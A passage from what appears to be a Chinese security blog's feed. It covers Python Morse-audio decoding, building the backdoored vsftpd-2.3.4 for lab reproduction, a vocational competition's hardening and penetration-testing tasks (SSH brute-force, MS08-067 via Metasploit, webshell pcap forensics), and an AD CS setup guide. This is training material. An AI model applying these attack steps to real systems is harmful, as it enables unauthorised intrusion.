# 转换为摩斯电码
morse_result = ""
for i in range(len(morse_type)):
    if morse_type[i] == 1:
        # 大于平均长度为"-"
        if morse_len[i] > morse_block_avg:
            morse_result += "-"
        # 小于平均长度即为"."
        elif morse_len[i] < morse_block_avg:
            morse_result += "."
    # 大于平均空位长度的为分割
    elif morse_type[i] == 0:
        if morse_len[i] > morse_blank_avg:
            morse_result += "/"

解码数据

使用如下字典解码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
morse_dict = {
    '.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', '.': 'E', '..-.': 'F',
    '--.': 'G', '....': 'H', '..': 'I', '.---': 'J', '-.-': 'K', '.-..': 'L',
    '--': 'M', '-.': 'N', '---': 'O', '.--.': 'P', '--.-': 'Q', '.-.': 'R',
    '...': 'S', '-': 'T', '..-': 'U', '...-': 'V', '.--': 'W', '-..-': 'X',
    '-.--': 'Y', '--..': 'Z',

    '.----': '1', '..---': '2', '...--': '3', '....-': '4', '.....': '5',
    '-....': '6', '--...': '7', '---..': '8', '----.': '9', '-----': '0',

    '.-.-.-': '.', '---...': ':', '--..--': ',', '-.-.-.': ';', '..--..': '?',
    '-...-': '=', '.----.': '\'', '-..-.': '/', '-.-.--': '!', '-....-': '-',
    '..--.-': '_', '.-..-.': '"', '-.--.': '(', '-.--.-': ')', '...-..-': '$',
    '.--.-.': '@'
}
1
2
3
4
5
# 摩斯电码解码
morse_array = morse_result.split("/")
plain_text = ""
for morse in morse_array:
    plain_text += morse_dict[morse]

plain_text 变量中即为解码后的数据

验证

analyze-morse-code-from-audio_04.png

参考:
利用python自动解析摩斯电码音频文件_如何从音频中提取摩斯密码_Rabbit_Gray的博客-CSDN博客
使用Python绘制语音信号的波形图_python画信号图_进击的小杨人的博客-CSDN博客
Python 波形处理_Rone-X的博客-CSDN博客

]]> https://blog.moling.ink/articles/analyze-morse-code-from-audio/ 2023-08-19T19:45:22.000Z 详细讲解如何使用 Python 的 wave、numpy、pylab 等库从音频文件中自动提取摩斯密码的算法原理与实现过程,包括音频载入、频谱分析、长短信号识别、摩斯电码解码等完整流程,附带开源工具 MorseAudioDecoder 使用 Python 从音频中提取摩斯密码 2026-03-24T07:16:31.687Z Malpl3naInk 系统信息

操作系统:

CentOS 7 x86_64

Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

构建

  • 此处 克隆 vsftpd-2.3.4 的源代码

  • 修改 builddefs.h

1
2
3
#define VSF_BUILD_TCPWRAPPERS
#define VSF_BUILD_PAM
#define VSF_BUILD_SSL
  • 安装依赖
1
yum install libcap-devel pam-devel
  • 构建
1
make

运行

1
./vsftpd ./vsftpd.conf
]]> https://blog.moling.ink/articles/build-vsftpd-2.3.4-infected/ 2023-04-17T13:43:05.000Z 详细记录在 CentOS 7 系统上从源码编译构建 vsftpd-2.3.4 infected 后门版本的完整流程,包括依赖安装、编译配置及运行步骤,用于漏洞复现和渗透测试学习 构建 vsftpd-2.3.4 2026-03-24T07:16:31.687Z Malpl3naInk

注:
该文档仅包含赛题

模块A

A-1:登录安全加固

请对服务器Web按要求进行相应的设置,提高服务器的安全性。

  1. 密码策略(Web)

    a. 最小密码长度不少于8个字符,将密码长度最小值的属性配置界面截图;

    b.密码策略必须同时满足大小写字母、数字、特殊字符,将密码必须符合复杂性要求的属性配置界面截图。

  2. 登录策略(Web)

    a.在用户登录系统时,应该有“For authorized users only”提示信息,将登录系统时系统弹出警告信息窗口截图;

    b.一分钟内仅允许5次登录失败的尝试,超过5次,登录帐号锁定1分钟,将账户锁定策略配置界面截图;

    c.远程用户非活动会话连接超时应小于等于5分钟,将RDP-Tcp属性对应的配置界面截图。

  3. 用户安全管理(Web)

    a.对服务器进行远程管理安全性SSL加固,防止敏感信息泄露被监听,将RDP-Tcp属性对应的配置界面截图;

    b.仅允许超级管理员账号关闭系统,将关闭系统属性的配置界面截图。

A-2:Web安全加固(Web)

  1. 为了防止web中.mdb数据库文件非法下载,请对Web配置文件进行安全加固,将C:\Windows\System32\inetsrv\config\applicationHost配置文件中对应的部分截图;

  2. 限制目录执行权限,对picture和upload目录设置执行权限为无,将编辑功能权限的配置界面截图;

  3. 开启IIS的日志审计记录(日志文件保存格式为W3C,只记录日期、时间、客户端IP地址、用户名、方法),将W3C日志记录字段的配置界面截图;

  4. 为了减轻网站负载,设置网站最大并发连接数为1000,将编辑网站限制的配置界面截图;

  5. 防止文件枚举漏洞枚举网络服务器根目录文件,禁止IIS短文件名泄露,将配置命令截图;

  6. 关闭IIS的WebDAV功能增强网站的安全性,将警报提示信息截图。

A-3:流量完整性保护与事件监控(Web,Log)

  1. 为了防止密码在登录或者传输信息时被窃取,仅使用证书登录SSH(Log),将/etc/ssh/sshd_config配置文件中对应的部分截图;

  2. 将Web服务器开启审核策略

    登录事件 成功/失败;

    特权使用 成功;

    策略更改 成功/失败;

    进程跟踪 成功/失败;

    将审核策略的配置界面截图;

  3. 配置Splunk接收Web服务器,安全日志,系统日志,CPU负载,内存,磁盘空间,网络状态。将转发器:部署成功的页面截图。

A-4:防火墙策略

所有服务器开启防火墙,为防止勒索病毒攻击对防火墙进行加固策略:

  1. Windows系统禁用445端口,将防火墙入站规则截图;

  2. Linux系统禁用23端口,将iptables配置命令截图;

  3. Linux系统禁止别人ping通,将iptables配置命令截图;

  4. Linux系统为确保安全禁止所有人连接SSH除了172.16.1.1这个ip,将iptables配置命令截图。

模块B

B-1:SSH弱口令渗透测试

  1. 在本地PC渗透测试平台Kali中使用zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须的字符串作为FLAG提交(忽略ip地址)

  2. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中SSH服务对应的服务端口信息作为FLAG提交

  3. 在本地PC渗透测试平台Kali中使用MSF模块对其爆破,使用search命令,并将扫描弱口令模块的名称信息作为FLAG提交

  4. 在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,……)

  5. 在MSF模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交

  6. 在MSF模块中指定密码字典,字典路径为桌面tools文件夹2.txt,用户名为test爆破获取密码并将得到的密码作为FLAG提交

  7. 在上一题的基础上,使用第6题获取到的密码SSH到靶机,将test用户家目录中唯一一个后缀为.bmp图片的文件名的字符串作为FLAG提交

B-2:数字分析数字取证

  1. 访问靶机FTP服务,下载attack.pcapng数据包文件,通过分析数据包attack.pcapng找出恶意用户的IP地址,并将恶意用户的IP地址作为FLAG(形式:[IP地址])提交

  2. 继续查看数据包文件attack.pcapng,分析出恶意用户扫描了那些端口,并将全部的端口作为FLAG(形式:[端口名1,端口名2,端口名3……端口名n])从低到高提交

  3. 继续查看数据包文件attack.pcapng分析出恶意用户最终获得的用户名是什么,并将用户名作为FLAG(形式:[用户名])提交

  4. 继续查看数据包文件attack.pcapng分析出恶意用户最终获得的密码是什么,并将密码作为FLAG(形式:[密码])提交

  5. 继续查看数据包文件attack.pcapng分析出恶意用户连接一句话木马的密码是什么,并将一句话密码作为FLAG(形式:[一句话密码])提交

  6. 继续查看数据包文件attack.pcapng分析出恶意用户下载了什么文件,并将文件名及后缀作为FLAG(形式:[文件名。后缀名])提交

  7. 继续查看数据包文件attack.pcapng将恶意用户下载的文件里面的内容作为FLAG(形式:[文件内容])提交

B-3:漏洞扫描与利用

  1. 通过本地PC中渗透测试平台Kali对服务器场景server2008以半开放式不进行ping的扫描方式并配合a,要求扫描信息输出格式为xml文件格式,从生成扫描结果获取局域网(例如172.16.101.0/24)中存活靶机,以xml格式向指定文件输出信息(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为FLAG提交(各参数之间用英文逗号分割,例a,b,c,d)

  2. 根据第一题扫描的回显信息分析靶机操作系统版本信息,将操作系统版本信息作为FLAG提交

  3. 根据第一题扫描的回显信息分析靶机开放端口,分析开放的服务,并将共享服务的开放状态作为FLAG提交

  4. 在本地PC的渗透测试平台Kali中,使用命令初始化msf数据库,并将使用的命令作为FLAG提交

  5. 在本地PC的渗透测试平台Kali中,打开msf,使用db_import将扫描结果导入到数据库中,并查看导入的数据,将查看导入的数据要使用的命令作为FLAG提交

  6. 在msfconsole使用search命令搜索MS08067漏洞攻击程序,并将回显结果中的漏洞时间作为FLAG提交

  7. 在msfconsole中利用MS08067漏洞攻击模块,将调用此模块的命令作为FLAG提交

  8. 在上一步的基础上查看需要设置的选项,并将回显中需设置的选项名作为FLAG提交

  9. 使用set命令设置目标IP(在第8步的基础上),并检测漏洞是否存在,将回显结果中最后四个单词作为FLAG提交

  10. 查看可选项中存在此漏洞的系统版本,判断该靶机是否有次漏洞,若有,将存在此漏洞的系统版本序号作为FLAG提交,否则FLAG为none

B-4:Web安全之综合渗透测试

  1. 通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果作为FLAG值提交

  2. 通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果作为FLAG值提交

  3. 通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果作为FLAG值提交

  4. 通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果作为FLAG值提交

  5. 通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果作为FLAG值提交

  6. 通过URL访问http://靶机IP/6,对该页面进行渗透测试,将完成后返回的结果作为FLAG值提交

]]> https://blog.moling.ink/articles/7th-Jiaxing-vocational-skill-competition/ 2022-11-09T13:53:21.000Z 完整收录嘉兴市第七届中等职业学校技能节网络安全赛项的全部赛题内容,涵盖 A 模块系统安全加固(登录策略、密码策略、IIS 加固、防火墙配置、Splunk 部署)和 B 模块渗透测试(SSH 弱口令爆破、数据包取证、Nmap 扫描、Metasploit 漏洞利用、Web 综合渗透)等任务 嘉兴市第七届中等职业学校技能节-网络安全赛项 赛题 2026-03-24T07:16:31.684Z Malpl3naInk 系统信息

操作系统:

Windows Server 2008 R2 Datacenter x64

下载:

ed2k

安装 Active Directory 域服务

  • 服务器管理器 中选择 添加角色

  • 勾选 Active Directory 域服务 , 在 添加角色向导 中点击 添加必须的功能

AD-CS-Install-Tutorial_01.jpg

  • 点击 安装 按钮完成Active Directory 域服务的安装, 安装完成后点击 关闭该向导并启动 Active Directory 域服务 安装向导(dcpromo.exe)

AD-CS-Install-Tutorial_02.jpg

  • 选中 在林中新建域 , 点击 下一步

如果出现如图所示的错误, 需要在控制面板中给 Administrator 账户设置密码

AD-CS-Install-Tutorial_03.jpg

  • 命名林根域 页面中输入根域的名字, 在接下来的 设置林功能级别 页面中设置基本为 Windows Server 2008 R2

  • 如果提示静态IP分配, 则按照需求选择选项. 此处选择

AD-CS-Install-Tutorial_04.jpg

  • 提示 无法创建该 DNS 服务器的委派 , 选择

AD-CS-Install-Tutorial_05.jpg

  • 为 Administrator 分配密码

AD-CS-Install-Tutorial_06.jpg

  • 等待配置完成后, Active Directory 域服务 则已安装完毕

安装 Active Directory 证书服务

  • 上部分操作完成后, 显示需要重启, 选择 立即重新启动

  • 重新启动完成后,以管理员运行命令提示符并运行命令 net group "Domain Admins" <当前登录用户名> /add

  • 添加角色向导 中选中 Active Directory 证书服务

  • 在下一页中选中 证书颁发机构 Web 注册

  • 指定安装类型 选择 企业

在没有将当前用户添加到 Domain AdminsEnterprise Admins 用户组中时, 企业 选项将无法选择

  • CA类型选择 根CA, 新建私钥 并保持默认设置

  • 完成安装后, 可以在 IIS 管理器 中 Default Web Site 网站中找到 certsrv 选项

AD-CS-Install-Tutorial_07.jpg

注意:

在访问证书签发的 Web 页面时需要使用 IP 地址进行访问, 并完成身份认证, 否则会出现以下错误信息

AD-CS-Install-Tutorial_08.jpg

注: 使用 Windows 自带认证时可能出现无法登录的错误

]]> https://blog.moling.ink/articles/AD-CS-Install-Tutorial/ 2022-05-21T21:41:58.000Z 图文详解在 Windows Server 2008 R2 上安装配置 Active Directory 域服务(AD DS)和证书服务(AD CS)的完整流程,包括域控制器部署、DNS 配置、企业 CA 安装及常见问题解决方案 安装 Active Directory 证书服务 2026-03-24T07:16:31.687Z